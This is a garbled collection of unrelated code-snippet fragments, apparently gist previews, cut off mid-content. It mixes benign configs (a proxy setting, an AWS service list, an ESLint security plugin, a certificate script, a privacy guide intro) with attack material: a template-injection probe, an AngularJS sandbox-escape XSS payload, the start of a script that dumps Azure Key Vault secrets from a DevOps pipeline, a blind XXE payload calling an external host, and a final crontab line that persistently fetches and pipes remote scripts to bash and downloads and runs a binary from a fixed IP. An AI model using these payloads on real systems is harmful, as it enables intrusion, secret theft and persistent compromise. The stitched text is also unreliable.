{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
#Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec! | |
#reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline | |
#Suppress warnings for clean output | |
Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true" | |
#Get all Azure KeyVaults from currently selected/scoped subscription | |
#This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity | |
$vaults = Get-AzKeyVault |
{ | |
"mode": "patterns", | |
"proxySettings": [ | |
{ | |
"address": "127.0.0.1", | |
"port": 8080, | |
"username": "", | |
"password": "", | |
"type": 1, | |
"title": "127.0.0.1:8080", |
a4b.amazonaws.com | |
access-analyzer.amazonaws.com | |
account.amazonaws.com | |
acm-pca.amazonaws.com | |
acm.amazonaws.com | |
airflow-env.amazonaws.com | |
airflow.amazonaws.com | |
alexa-appkit.amazon.com | |
alexa-connectedhome.amazon.com | |
amazonmq.amazonaws.com |
{ | |
"plugins": ["security"], | |
"env": { | |
"node": true, | |
"es6": true | |
}, | |
"rules": { | |
'security/detect-unsafe-regex': 1, | |
'security/detect-non-literal-regexp': 1, | |
'security/detect-non-literal-require': 1, |
#!/usr/bin/env bash | |
# A basic Self Signed SSL Certificate utility | |
# by Andrea Giammarchi @WebReflection | |
# https://www.webreflection.co.uk/blog/2015/08/08/bringing-ssl-to-your-private-network | |
# # to make it executable and use it | |
# $ chmod +x certificate | |
# $ ./certificate # to read the how-to |
The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.
I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k |